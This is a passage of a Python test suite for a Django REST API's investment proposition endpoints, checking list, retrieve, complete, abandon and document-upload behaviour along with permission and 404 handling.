3, investment_project=investment_project,
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
if api_version == 'v3':
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': investment_project.pk,
},
)
response = api_client.get(url)
else:
url = reverse('api-v4:proposition:collection')
response = api_client.get(url, {'investment_project_id': investment_project.pk})
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert response_data['count'] == 3
actual_ids = {i['id'] for i in response_data['results']}
expected_ids = {str(i.id) for i in propositions}
assert actual_ids == expected_ids
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_user_cannot_list_propositions_for_non_existent_investment_project(self, permissions):
"""Test user cannot list propositions for a non existent investment project."""
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': uuid.uuid4(),
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_404_NOT_FOUND
response_data = response.json()
assert response_data == {'detail': 'Not found.'}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_filter_by_non_existent_investment_project(self, permissions):
"""Test user gets error when filtering by a non existent investment project."""
url = reverse('api-v4:proposition:collection')
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url, {'investment_project_id': uuid.uuid4()})
assert response.status_code == status.HTTP_400_BAD_REQUEST
response_data = response.json()
assert response_data == {
'investment_project_id': [
'Select a valid choice. That choice is not one of the available choices.',
],
}
@pytest.mark.parametrize('api_version', ('v3', 'v4'))
def test_restricted_user_can_list_propositions(self, api_version):
"""List of propositions by a restricted user."""
PropositionFactory.create_batch(3)
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
propositions = PropositionFactory.create_batch(
3, investment_project=investment_project,
)
user = create_test_user(
permission_codenames=(
PropositionPermission.view_associated,
),
dit_team=project_creator.dit_team,
)
api_client = self.create_api_client(user=user)
if api_version == 'v3':
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': investment_project.pk,
},
)
response = api_client.get(url)
else:
url = reverse('api-v4:proposition:collection')
response = api_client.get(url, {'investment_project_id': investment_project.pk})
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert response_data['count'] == 3
actual_ids = {i['id'] for i in response_data['results']}
expected_ids = {str(i.id) for i in propositions}
assert actual_ids == expected_ids
@pytest.mark.parametrize('api_version', ('v3', 'v4'))
def test_restricted_user_cannot_list_non_associated_ip_propositions(self, api_version):
"""Restricted user cannot list non associated investment project propositions."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
PropositionFactory.create_batch(
3, investment_project=investment_project,
)
user = create_test_user(
permission_codenames=(
PropositionPermission.view_associated
),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
if api_version == 'v3':
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': investment_project.pk,
},
)
response = api_client.get(url)
else:
url = reverse('api-v4:proposition:collection')
response = api_client.get(url, {'investment_project_id': investment_project.pk})
assert response.status_code == status.HTTP_403_FORBIDDEN
response_data = response.json()
assert response_data == {
'detail': 'You do not have permission to perform this action.',
}
@pytest.mark.parametrize('api_version', ('v3', 'v4'))
def test_filtered_by_adviser(self, api_version):
"""List of propositions filtered by assigned adviser."""
adviser = AdviserFactory()
investment_project = InvestmentProjectFactory()
PropositionFactory.create_batch(
3, investment_project=investment_project,
)
propositions = PropositionFactory.create_batch(
3,
adviser=adviser,
investment_project=investment_project,
)
if api_version == 'v3':
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': investment_project.pk,
},
)
response = self.api_client.get(url, {'adviser_id': adviser.id})
else:
url = reverse('api-v4:proposition:collection')
response = self.api_client.get(
url,
{
'adviser_id': adviser.id,
'investment_project_id': investment_project.pk,
},
)
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert response_data['count'] == 3
actual_ids = {i['id'] for i in response_data['results']}
expected_ids = {str(i.id) for i in propositions}
assert actual_ids == expected_ids
@pytest.mark.parametrize('api_version', ('v3', 'v4'))
@pytest.mark.parametrize(
'proposition_status',
(
PropositionStatus.ONGOING,
PropositionStatus.ABANDONED,
PropositionStatus.COMPLETED,
),
)
def test_filtered_by_status(self, proposition_status, api_version):
"""List of propositions filtered by status."""
statuses = (
PropositionStatus.ONGOING,
PropositionStatus.ABANDONED,
PropositionStatus.COMPLETED,
)
investment_project = InvestmentProjectFactory()
PropositionFactory.create_batch(
3,
status=factory.Iterator(statuses),
investment_project=investment_project,
)
if api_version == 'v3':
url = reverse(
'api-v3:investment:proposition:collection',
kwargs={
'project_pk': investment_project.pk,
},
)
response = self.api_client.get(url, {'status': proposition_status})
else:
url = reverse('api-v4:proposition:collection')
response = self.api_client.get(
url,
{
'status': proposition_status,
'investment_project_id': investment_project.pk,
},
)
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert response_data['count'] == 1
assert response_data['results'][0]['status'] == proposition_status
class TestGetProposition(APITestMixin):
"""Tests for get proposition view."""
def test_fails_without_permissions(self, api_client):
"""Should return 401"""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
response = api_client.get(url)
assert response.status_code == status.HTTP_401_UNAUTHORIZED
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_non_restricted_user_can_get_proposition(self, permissions):
"""Test get proposition by a non restricted user."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.ONGOING,
'name': proposition.name,
'scope': proposition.scope,
'details': '',
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
def test_restricted_user_can_get_proposition(self):
"""Test get proposition by a restricted user."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(
PropositionPermission.view_associated,
),
dit_team=project_creator.dit_team,
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.ONGOING,
'name': proposition.name,
'scope': proposition.scope,
'details': '',
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
def test_restricted_user_cannot_get_non_associated_ip_proposition(self):
"""Test get non associated ip proposition by a restricted user."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(
PropositionPermission.view_associated,
),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
response_data = response.json()
assert response_data == {
'detail': 'You do not have permission to perform this action.',
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_user_cannot_get_proposition_for_non_existent_project(self, permissions):
"""Test user cannot get proposition by a non restricted user."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': uuid.uuid4(),
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_404_NOT_FOUND
response_data = response.json()
assert response_data == {'detail': 'Not found.'}
class TestDeleteProposition(APITestMixin):
"""Tests for delete proposition view."""
def test_fails_without_permissions(self, api_client):
"""Should return 401"""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
response = api_client.delete(url)
assert response.status_code == status.HTTP_401_UNAUTHORIZED
@pytest.mark.parametrize('permissions', NON_RESTRICTED_DELETE_PERMISSIONS)
def test_non_restricted_user_cannot_delete_proposition(self, permissions):
"""Test that non restricted user cannot delete proposition."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.delete(url)
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED
assert response.json() == {'detail': 'Method is not allowed.'}
class TestCompleteProposition(APITestMixin):
"""Tests for the complete proposition view."""
@pytest.mark.parametrize('permissions', NON_RESTRICTED_CHANGE_PERMISSIONS)
def test_non_restricted_user_can_complete_proposition(self, permissions):
"""Test completing proposition by non restricted user."""
user = create_test_user(permission_codenames=permissions)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
proposition.refresh_from_db()
response_data = response.json()
assert response.status_code == status.HTTP_200_OK
assert proposition.modified_by == user
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.COMPLETED,
'name': proposition.name,
'scope': proposition.scope,
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'details': '',
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_CHANGE_PERMISSIONS)
def test_user_cannot_complete_proposition_for_non_existent_project(self, permissions):
"""Test user cannot complete proposition for non existent investment project."""
user = create_test_user(permission_codenames=permissions)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': uuid.uuid4(),
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
assert response.status_code == status.HTTP_404_NOT_FOUND
response_data = response.json()
assert response_data == {'detail': 'Not found.'}
def test_restricted_user_can_complete_proposition(self):
"""Test completing proposition by a restricted user."""
project_creator = AdviserFactory()
user = create_test_user(
permission_codenames=(
PropositionPermission.change_associated,
),
dit_team=project_creator.dit_team,
)
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
proposition.refresh_from_db()
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
assert proposition.modified_by == user
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.COMPLETED,
'name': proposition.name,
'scope': proposition.scope,
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'details': '',
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
def test_restricted_user_cannot_complete_non_associated_ip_proposition(self):
"""Test restricted user cannot complete non associated investment project proposition."""
project_creator = AdviserFactory()
user = create_test_user(
permission_codenames=(
PropositionPermission.change_associated,
),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
response_data = response.json()
assert response_data == {
'detail': 'You do not have permission to perform this action.',
}
proposition.refresh_from_db()
assert proposition.details == ''
assert proposition.modified_by != user
@pytest.mark.parametrize(
'proposition_status', (
PropositionStatus.COMPLETED, PropositionStatus.ABANDONED,
),
)
def test_cannot_complete_proposition_without_ongoing_status(self, proposition_status):
"""Test cannot complete proposition that doesn't have ongoing status."""
user = create_test_user(
permission_codenames=(
PropositionPermission.change_all,
),
dit_team=TeamFactory(),
)
proposition = PropositionFactory(
status=proposition_status,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
response_data = response.json()
assert response.status_code == status.HTTP_409_CONFLICT
detail = f'The action cannot be performed in the current status {proposition_status}.'
assert response_data['detail'] == detail
proposition.refresh_from_db()
assert proposition.status == proposition_status
assert proposition.details == ''
def test_cannot_complete_proposition_without_uploading_documents(self):
"""Test cannot complete proposition without uploading documents."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:complete',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
response = self.api_client.post(url)
assert response.status_code == status.HTTP_400_BAD_REQUEST
response_data = response.json()
assert response_data['non_field_errors'] == ['Proposition has no documents uploaded.']
proposition.refresh_from_db()
assert proposition.status == PropositionStatus.ONGOING
class TestAbandonProposition(APITestMixin):
"""Tests for the abandon proposition view."""
@pytest.mark.parametrize('permissions', NON_RESTRICTED_CHANGE_PERMISSIONS)
def test_non_restricted_user_can_abandon_proposition(self, permissions):
"""Test abandoning proposition by non restricted user."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
{
'details': 'Not enough information.',
},
)
assert response.status_code == status.HTTP_200_OK
proposition.refresh_from_db()
response_data = response.json()
assert proposition.modified_by == user
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.ABANDONED,
'name': proposition.name,
'scope': proposition.scope,
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'details': proposition.details,
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_CHANGE_PERMISSIONS)
def test_user_cannot_abandon_proposition_for_non_existent_project(self, permissions):
"""Test user cannot abandon proposition for non existent investment project."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': uuid.uuid4(),
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
{
'details': 'Not enough information.',
},
)
assert response.status_code == status.HTTP_404_NOT_FOUND
response_data = response.json()
assert response_data == {'detail': 'Not found.'}
def test_restricted_user_can_abandon_proposition(self):
"""Test abandoning proposition by restricted user."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(
PropositionPermission.change_associated,
),
dit_team=project_creator.dit_team,
)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
{
'details': 'Not enough information.',
},
)
assert response.status_code == status.HTTP_200_OK
proposition.refresh_from_db()
response_data = response.json()
assert proposition.modified_by == user
assert response_data == {
'id': str(proposition.pk),
'investment_project': {
'name': proposition.investment_project.name,
'project_code': proposition.investment_project.project_code,
'id': str(proposition.investment_project.pk),
},
'adviser': {
'first_name': proposition.adviser.first_name,
'last_name': proposition.adviser.last_name,
'name': proposition.adviser.name,
'id': str(proposition.adviser.pk),
},
'deadline': proposition.deadline.isoformat(),
'status': PropositionStatus.ABANDONED,
'name': proposition.name,
'scope': proposition.scope,
'created_on': format_date_or_datetime(proposition.created_on),
'created_by': {
'first_name': proposition.created_by.first_name,
'last_name': proposition.created_by.last_name,
'name': proposition.created_by.name,
'id': str(proposition.created_by.pk),
},
'details': proposition.details,
'modified_on': format_date_or_datetime(proposition.modified_on),
'modified_by': {
'first_name': proposition.modified_by.first_name,
'last_name': proposition.modified_by.last_name,
'name': proposition.modified_by.name,
'id': str(proposition.modified_by.pk),
},
}
def test_restricted_user_cannot_abandon_non_associated_ip_proposition(self):
"""Test restricted user cannot abandon non associated investment project proposition."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(
PropositionPermission.change_associated,
),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
{
'details': 'Not enough information.',
},
)
assert response.status_code == status.HTTP_403_FORBIDDEN
response_data = response.json()
assert response_data == {
'detail': 'You do not have permission to perform this action.',
}
proposition.refresh_from_db()
assert proposition.details == ''
assert proposition.modified_by != user
@pytest.mark.parametrize(
'proposition_status', (
PropositionStatus.COMPLETED, PropositionStatus.ABANDONED,
),
)
def test_cannot_abandon_proposition_without_ongoing_status(self, proposition_status):
"""Test cannot abandon proposition that doesn't have ongoing status."""
proposition = PropositionFactory(
status=proposition_status,
)
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
response = self.api_client.post(
url,
{
'details': 'Too many cats.',
},
)
assert response.status_code == status.HTTP_409_CONFLICT
response_data = response.json()
detail = f'The action cannot be performed in the current status {proposition_status}.'
assert response_data['detail'] == detail
proposition.refresh_from_db()
assert proposition.status == proposition_status
assert proposition.details == ''
def test_cannot_abandon_proposition_without_details(self):
"""Test cannot abandon proposition without giving details."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:abandon',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
response = self.api_client.post(
url,
{
'details': '',
},
)
assert response.status_code == status.HTTP_400_BAD_REQUEST
response_data = response.json()
assert response_data['details'] == ['This field may not be blank.']
proposition.refresh_from_db()
assert proposition.status == PropositionStatus.ONGOING
@pytest.mark.parametrize('http_method', ('get', 'post'))
class TestPropositionDocumentCollectionView404Handling(APITestMixin):
"""Tests for 404-handling in the proposition document collection view."""
def test_returns_404_for_non_existent_project(self, http_method):
"""Test that a 404 is returned if an non-existent project is specified."""
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'project_pk': uuid.uuid4(),
'proposition_pk': proposition.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_non_existent_proposition(self, http_method):
"""Test that a 404 is returned if an non-existent proposition is specified."""
project = InvestmentProjectFactory()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'project_pk': project.pk,
'proposition_pk': uuid.uuid4(),
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_mismatched_proposition_and_project(self, http_method):
"""Test that a 404 is returned if an unrelated project and proposition are specified."""
proposition = PropositionFactory()
project = InvestmentProjectFactory()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'project_pk': project.pk,
'proposition_pk': proposition.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
@pytest.mark.parametrize(
'urlname,http_method',
(
('api-v3:investment:proposition:document-item', 'get'),
('api-v3:investment:proposition:document-item', 'delete'),
('api-v3:investment:proposition:document-item-callback', 'post'),
('api-v3:investment:proposition:document-item-download', 'get'),
),
)
class TestPropositionDocumentItemViews404Handling(APITestMixin):
"""Tests for 404-handling in all proposition document item views."""
def test_returns_404_for_non_existent_project(self, urlname, http_method):
"""Test that a 404 is returned if a non-existent project is specified."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=self.user,
)
url = reverse(
urlname,
kwargs={
'project_pk': uuid.uuid4(),
'proposition_pk': proposition.pk,
'entity_document_pk': entity_document.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_non_existent_proposition(self, urlname, http_method):
"""Test that a 404 is returned if a non-existent proposition is specified."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=self.user,
)
url = reverse(
urlname,
kwargs={
'project_pk': proposition.investment_project.pk,
'proposition_pk': uuid.uuid4(),
'entity_document_pk': entity_document.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_non_existent_document(self, urlname, http_method):
"""Test that a 404 is returned if a non-existent document is specified."""
proposition = PropositionFactory()
url = reverse(
urlname,
kwargs={
'project_pk': proposition.investment_project.pk,
'proposition_pk': proposition.pk,
'entity_document_pk': uuid.uuid4(),
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_unrelated_project(self, urlname, http_method):
"""Test that a 404 is returned if an unrelated project is specified."""
unrelated_project = InvestmentProjectFactory()
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=self.user,
)
url = reverse(
urlname,
kwargs={
'project_pk': unrelated_project.pk,
'proposition_pk': proposition.pk,
'entity_document_pk': entity_document.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_returns_404_for_unrelated_proposition(self, urlname, http_method):
"""Test that a 404 is returned if an unrelated proposition is specified."""
proposition = PropositionFactory()
unrelated_proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=self.user,
)
url = reverse(
urlname,
kwargs={
'project_pk': proposition.investment_project.pk,
'proposition_pk': unrelated_proposition.pk,
'entity_document_pk': entity_document.pk,
},
)
response = self.api_client.generic(http_method, url)
assert response.status_code == status.HTTP_404_NOT_FOUND
class TestPropositionDocumentViews(APITestMixin):
"""Tests for the proposition document views."""
@pytest.mark.parametrize('permissions', NON_RESTRICTED_ADD_PERMISSIONS)
@patch.object(Document, 'get_signed_upload_url')
def test_document_creation(self, get_signed_upload_url_mock, permissions):
"""Test document creation."""
get_signed_upload_url_mock.return_value = 'http://document-about-ocelots'
proposition = PropositionFactory()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
data={
'original_filename': 'test.txt',
},
)
assert response.status_code == status.HTTP_201_CREATED
response_data = response.data
entity_document = PropositionDocument.objects.get(pk=response_data['id'])
assert entity_document.original_filename == 'test.txt'
assert entity_document.proposition.pk == proposition.pk
assert response_data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.NOT_VIRUS_SCANNED,
'signed_upload_url': 'http://document-about-ocelots',
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
@patch.object(Document, 'get_signed_upload_url')
def test_restricted_user_can_create_associated_document(self, get_signed_upload_url_mock):
"""Test that restricted user can create associated document."""
get_signed_upload_url_mock.return_value = 'http://document-about-ocelots'
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.add_associated,),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=user,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
data={
'original_filename': 'test.txt',
},
)
assert response.status_code == status.HTTP_201_CREATED
response_data = response.data
entity_document = PropositionDocument.objects.get(pk=response_data['id'])
assert entity_document.original_filename == 'test.txt'
assert entity_document.proposition.pk == proposition.pk
assert response_data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.NOT_VIRUS_SCANNED,
'signed_upload_url': 'http://document-about-ocelots',
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
def test_restricted_user_cannot_create_non_associated_documents(self):
"""Test that restricted user cannot create non associated document."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.add_associated,),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
response = api_client.post(
url,
data={
'original_filename': 'test.txt',
},
)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.data == {
'detail': 'You do not have permission to perform this action.',
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
